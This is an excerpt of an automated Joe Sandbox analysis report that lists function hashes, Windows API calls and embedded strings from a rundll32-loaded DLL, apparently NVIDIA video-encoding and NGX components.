                                                                                                                                  • Instruction ID: f26a588484a3dedbfc63dc8b9e97b0b9134f1d1e67f009b897f996952a359dde
                                                                                                                                  • Opcode Fuzzy Hash: 9f186a2e040995e6f0b0e64b1a87cd653ec6994900668234fa6fa4513ef19a1e
                                                                                                                                  • Instruction Fuzzy Hash: 45612539B49B8285F674CFD1BCB813033ACBF48B55B5A4539D49EE2A60CF7C6460A319
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc$LibraryLoad
                                                                                                                                  • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                  • API String ID: 4089895538-3997890769
                                                                                                                                  • Opcode ID: 25bd4a92d865eb986d4886ce9e2fc91b6f185cd407b783bdb8d090bd23f88a26
                                                                                                                                  • Instruction ID: 5fc331ecfec00009a4cd2884bb0a0bebad1a66318b6d68ec6d26482157898654
                                                                                                                                  • Opcode Fuzzy Hash: 25bd4a92d865eb986d4886ce9e2fc91b6f185cd407b783bdb8d090bd23f88a26
                                                                                                                                  • Instruction Fuzzy Hash: 77313E20F0CB4782FB35AFE6E8783B522A9BF94741F804135D54E936A5EF6CE5189350
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionErrorFreeInfoLastLocalMaskVerifyVersion
                                                                                                                                  • String ID: Advapi32.dll$CurrentBuildNumber$RegCloseKey$RegOpenKeyExW$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                  • API String ID: 1705557312-2525593150
                                                                                                                                  • Opcode ID: d838daccb81d71d35b80107858d774af3e5616e532a7525f8534e3fbf145c2ea
                                                                                                                                  • Instruction ID: b0da0ae4477df4ac1bfd5b332b39290ce3a3f5af486fa48fd2cb83da637c0e73
                                                                                                                                  • Opcode Fuzzy Hash: d838daccb81d71d35b80107858d774af3e5616e532a7525f8534e3fbf145c2ea
                                                                                                                                  • Instruction Fuzzy Hash: 3D515C35B08B8285FB30CF95E8A46B563A8FB48B91F450239DA4E97B94DF7DE405D700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorLastLocalProc$AllocConditionFreeInfoMaskVerifyVersion
                                                                                                                                  • String ID: $SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                                                                                  • API String ID: 2783935822-2686055259
                                                                                                                                  • Opcode ID: 2c65741bb2e4e7683c67e8ef166769608d7f6bf1b8df71c7b07c1739b7130ba0
                                                                                                                                  • Instruction ID: 29007459ee37f0ab47806c10e89a4992bc45777be24f1f8927f63ac90e76cd1a
                                                                                                                                  • Opcode Fuzzy Hash: 2c65741bb2e4e7683c67e8ef166769608d7f6bf1b8df71c7b07c1739b7130ba0
                                                                                                                                  • Instruction Fuzzy Hash: 1A517C32B09B4282FB70CF95B4A426A63E8BB58B81F450139EA4E93B54EF7DE4058704
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorLastLocalProc$AllocConditionFreeInfoMaskVerifyVersion
                                                                                                                                  • String ID: $SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                                                                                  • API String ID: 2783935822-2686055259
                                                                                                                                  • Opcode ID: 6c6a4e8a0bcc7c5af865d58409ceb37ef023d90e6961c4f2e9d2de8a1adc6423
                                                                                                                                  • Instruction ID: 9188445de4f6b5191c0efa3662cf6422a0b971f3013e1ccb8fffef67d5ec341f
                                                                                                                                  • Opcode Fuzzy Hash: 6c6a4e8a0bcc7c5af865d58409ceb37ef023d90e6961c4f2e9d2de8a1adc6423
                                                                                                                                  • Instruction Fuzzy Hash: 2E514032B09B8282FB70DF95F4A426A63A8FB88781F440139DA8D93B54EF7DE415D704
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFreeLastLocal
                                                                                                                                  • String ID: Shell32.dll$ShellExecuteExA
                                                                                                                                  • API String ID: 3928016487-2609298245
                                                                                                                                  • Opcode ID: 6847e5a35347b6cc4f56585a02c2dcd8631616a208d8b4f60e6902eac1570615
                                                                                                                                  • Instruction ID: 0e698585bd5224a0b05dcef9cea66547c5f25f0e4a48ce32be7264ee0f4133be
                                                                                                                                  • Opcode Fuzzy Hash: 6847e5a35347b6cc4f56585a02c2dcd8631616a208d8b4f60e6902eac1570615
                                                                                                                                  • Instruction Fuzzy Hash: 4D318D61B09B4282FE749FE2B9B423963A5AF89BD1F08453CDD0E57B51EE6DE0109300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Console$ProcessWindow$AllocCloseCurrentOpenQueryThreadTitleValue
                                                                                                                                  • String ID: LogLevel$NGX$SOFTWARE\NVIDIA Corporation\Global\NGXCore
                                                                                                                                  • API String ID: 813702208-1451484610
                                                                                                                                  • Opcode ID: 50fab19680d1afe733d3e66660d2e70778c793c35c9ee94b78459fe8881ff264
                                                                                                                                  • Instruction ID: 0a4209908836595ad4e0105071d6a336a5fa5bad4209ea387d9a88a1c5ae9cf0
                                                                                                                                  • Opcode Fuzzy Hash: 50fab19680d1afe733d3e66660d2e70778c793c35c9ee94b78459fe8881ff264
                                                                                                                                  • Instruction Fuzzy Hash: 00413635B09A8286EB349F95F8A426AB3A8FF84795F400139DA4D53B78DFACE054D700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4099253644-0
                                                                                                                                  • Opcode ID: c236f47fa00f1eb095f464021b61fc5b1928e1c18c896dc44bc4746b0c097f4e
                                                                                                                                  • Instruction ID: e2653a9f16c68cd9db8ac6c19f3406fb9b710f8bb8de90df47967776b1696018
                                                                                                                                  • Opcode Fuzzy Hash: c236f47fa00f1eb095f464021b61fc5b1928e1c18c896dc44bc4746b0c097f4e
                                                                                                                                  • Instruction Fuzzy Hash: 6B314E31601A4C89FED7DB11E9613E563A0BB4D7D4F19C226BA190AAE5DFBCC68D8301
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AllocDirectoryFreeSystem$AddressErrorLastLibraryLoadProc
                                                                                                                                  • String ID: Advapi32.dll$RegQueryValueExW$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                  • API String ID: 3758263020-1610639660
                                                                                                                                  • Opcode ID: cbde8d636b6884e0b5bdf4ee94e9aa60a5168ff0c590a648ea3f7d8721b2ee0d
                                                                                                                                  • Instruction ID: 2445478ea54494ed38c560e7650135221c0f34c91a4f53927b013bb2030d6118
                                                                                                                                  • Opcode Fuzzy Hash: cbde8d636b6884e0b5bdf4ee94e9aa60a5168ff0c590a648ea3f7d8721b2ee0d
                                                                                                                                  • Instruction Fuzzy Hash: 3F417025B09B8282FA708F92B9A462AB3A4FF48BD5F440038ED4D67754DF7DE814DB00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFreeLastLocal
                                                                                                                                  • String ID: Shell32.dll$ShellExecuteExA
                                                                                                                                  • API String ID: 3928016487-2609298245
                                                                                                                                  • Opcode ID: 2e57f5782fe3bf08634fd71a5693bd78e2723d414804ef75c094206830ef4e48
                                                                                                                                  • Instruction ID: 623391d0dbc7418e47395d422e35b3c1fde3a778c06db922342a844491729e9d
                                                                                                                                  • Opcode Fuzzy Hash: 2e57f5782fe3bf08634fd71a5693bd78e2723d414804ef75c094206830ef4e48
                                                                                                                                  • Instruction Fuzzy Hash: AD217165B0DB4281FE78DFE2B9B01392294BF48BC1F044538D94E97F55DE6DE4509310
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Local$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 916652521-0
                                                                                                                                  • Opcode ID: 7233dbdddb0dc7e43d53d00e7812c2ac2f0c79c21a3cd17f9c0fc5ae811c0866
                                                                                                                                  • Instruction ID: 6cee5bf4e68306e2a2f2027f34435784d6256106f9f73493ec93f7c27da9eb69
                                                                                                                                  • Opcode Fuzzy Hash: 7233dbdddb0dc7e43d53d00e7812c2ac2f0c79c21a3cd17f9c0fc5ae811c0866
                                                                                                                                  • Instruction Fuzzy Hash: 6241C351B0C74242FF755FD2A5B43796295AF49BE1F044138DD0E5BB91EEBDE8818310
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FileLocal$AllocAttributesCloseCreateFreeHandleLibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 655590559-0
                                                                                                                                  • Opcode ID: 7468935337419462e1a44ad935823fa4f650fd4723db35e1c35ea56460038761
                                                                                                                                  • Instruction ID: 47d9aaf48cd022a9a7df85a5348361dd75b802fe316747e4b3768236ae00650c
                                                                                                                                  • Opcode Fuzzy Hash: 7468935337419462e1a44ad935823fa4f650fd4723db35e1c35ea56460038761
                                                                                                                                  • Instruction Fuzzy Hash: D241FF69F4C74286FB785BA2A5A023966D1EF44BD2F44433CEE4E06ED0CF7DE8528640
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$setlocalestd::_$Locinfo::_$ErrorFreeGetcvtHeapLastLocinfo_ctorLocinfo_dtorLockitLockit::____lc_codepage_func___lc_locale_name_func___mb_cur_max_func_errno_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3682056076-0
                                                                                                                                  • Opcode ID: ca3fb0b8572f38f04c8e7f887ed93a46820372b37fb06955fdddff351c3b93c0
                                                                                                                                  • Instruction ID: 0d852a346218120d3da4cb41429ba606f2c3b38bf25389faa73f1b0c9af31080
                                                                                                                                  • Opcode Fuzzy Hash: ca3fb0b8572f38f04c8e7f887ed93a46820372b37fb06955fdddff351c3b93c0
                                                                                                                                  • Instruction Fuzzy Hash: 87416B32B45B8889EB52DBB4D4503DC33B9AB687C8F05811AAA4927A9ADE70C659C340
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s: CreateEncoder failed with error - %x$%s: Invalid - %d buffer format passed$%s: Invalid pTrContext pointer passed$%s: Invalid size, possible wrong format $%s: Not able to create system memory buffer. Error - %x$CNvVideoTranscodeEx::AllocateUncompressedBuffersandEncoder$`anonymous-namespace'::GetDestBufferSizePerFormat
                                                                                                                                  • API String ID: 0-2103758211
                                                                                                                                  • Opcode ID: c1d11ccd792c239f3aef7748e9f0e087da3cd850e3c7ca25cdce25fa5a2da61b
                                                                                                                                  • Instruction ID: d65460f846c7b7ba67f06feada4198ce693e171f4f4b5bb675947cae83790798
                                                                                                                                  • Opcode Fuzzy Hash: c1d11ccd792c239f3aef7748e9f0e087da3cd850e3c7ca25cdce25fa5a2da61b
                                                                                                                                  • Instruction Fuzzy Hash: 17B1BCB2B08A4282FB30DFA4E8A13B933A4EB94B49F444135CE5D4769ADE7EE505C350
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: LocateXStateFeature$MessageBoxA$MessageBoxW$RoInitialize
                                                                                                                                  • API String ID: 2742660187-29969376
                                                                                                                                  • Opcode ID: 0c7dc754282232751ae50603538382f2149499098d56100760ace1ac31c63134
                                                                                                                                  • Instruction ID: f4d4f3cd2576693076502628eb7441f0cc559d8415540f188dc81d886c7a4ece
                                                                                                                                  • Opcode Fuzzy Hash: 0c7dc754282232751ae50603538382f2149499098d56100760ace1ac31c63134
                                                                                                                                  • Instruction Fuzzy Hash: 90416B61B08B82C2FA249FC2B8601E6A364FF59BC0F584536EE5C17B9ACE7CE545D740
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$Free$AddressAllocConditionErrorInfoLastMaskProcVerifyVersion
                                                                                                                                  • String ID: Advapi32.dll$CreateProcessAsUserA
                                                                                                                                  • API String ID: 3397555361-3368371401
                                                                                                                                  • Opcode ID: 7493b9120896b692fd6b8bb541b1dc1633219b3aa57d3fe30c3548db32e78fe2
                                                                                                                                  • Instruction ID: 12295c5ef2555e1960d2ea1bf91983abd6679131f7be22cd02f9d80d6a63ea0a
                                                                                                                                  • Opcode Fuzzy Hash: 7493b9120896b692fd6b8bb541b1dc1633219b3aa57d3fe30c3548db32e78fe2
                                                                                                                                  • Instruction Fuzzy Hash: A3319276B09B8286EA75DF96B8A026A73A8FF48BC1F044139DD4D53B54DF3DE0119B00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressDirectoryLocalProcSystem$AllocErrorFreeLastLibraryLoad
                                                                                                                                  • String ID: Advapi32.dll$RegCloseKey$RegOpenKeyExW
                                                                                                                                  • API String ID: 2875399084-618571997
                                                                                                                                  • Opcode ID: 28f397e54f1e24d26005662e88986d0bf696a147c640b84549ea0515995ecd5d
                                                                                                                                  • Instruction ID: fa35175eb73ddd9ec025dc4b2125bf0d82251b50aa0eb3fdd1b43ed67099f0c4
                                                                                                                                  • Opcode Fuzzy Hash: 28f397e54f1e24d26005662e88986d0bf696a147c640b84549ea0515995ecd5d
                                                                                                                                  • Instruction Fuzzy Hash: E0315C21B19B8282FA709F96F8B477962A8BF49BD1F480035DD4D63B64EF7DE4019700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Local$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 916652521-0
                                                                                                                                  • Opcode ID: f94a255190e780f5afcc3f384cf0fa8bf01a32dacb228848ed0e42394d41a5f4
                                                                                                                                  • Instruction ID: 3bd8643ea9a317f33a44d79a7d26a8b831fe955a2bd079328e21857984f7e18c
                                                                                                                                  • Opcode Fuzzy Hash: f94a255190e780f5afcc3f384cf0fa8bf01a32dacb228848ed0e42394d41a5f4
                                                                                                                                  • Instruction Fuzzy Hash: 5841B351B0C70342FB755FE6A56023962A4AF49BD1F044239DD0E57FD6DE7EE4419310
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - invalid bits-per-sample (bits) '%d'$%s No audio initialization data passed, returning error$%s invalid bitrate (kbps) '%d'$%s- invalid channel count '%d$%s- invalid sample rate (hz) '%d$CNvMFAACEncoder::InitializeMFTandMediaTypes
                                                                                                                                  • API String ID: 0-3830295964
                                                                                                                                  • Opcode ID: b58d4a504f29bfbd919c47ccc5bda832fbb375b0432de0edfb3321c01ac5011a
                                                                                                                                  • Instruction ID: ec8493ec2f62c5feb117dbb0583101e7a47f85190b2bd6d454ef32789eb95f1b
                                                                                                                                  • Opcode Fuzzy Hash: b58d4a504f29bfbd919c47ccc5bda832fbb375b0432de0edfb3321c01ac5011a
                                                                                                                                  • Instruction Fuzzy Hash: BD816032B18A4682FB70CF95E4A02A97774FB84B85F414136EA9D53BA8DF7DE454C700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3320480354-3145022300
                                                                                                                                  • Opcode ID: 997303cdb5246af4f3804dbc33bfa6d28888dcc0a64c4145d567fdc2599bd8a0
                                                                                                                                  • Instruction ID: 7396700a3e2aa9f6dcc0ca259bbfacf4549d370ee844549db4e676bec1950651
                                                                                                                                  • Opcode Fuzzy Hash: 997303cdb5246af4f3804dbc33bfa6d28888dcc0a64c4145d567fdc2599bd8a0
                                                                                                                                  • Instruction Fuzzy Hash: 35315E31604A8881FA97DB15E4503D97761F798BE0F58C322FA6D176E9DF38C68AC700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3809448442-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3240839640-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3809448442-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 4068408745-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3809448442-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 4068408745-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 4068408745-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
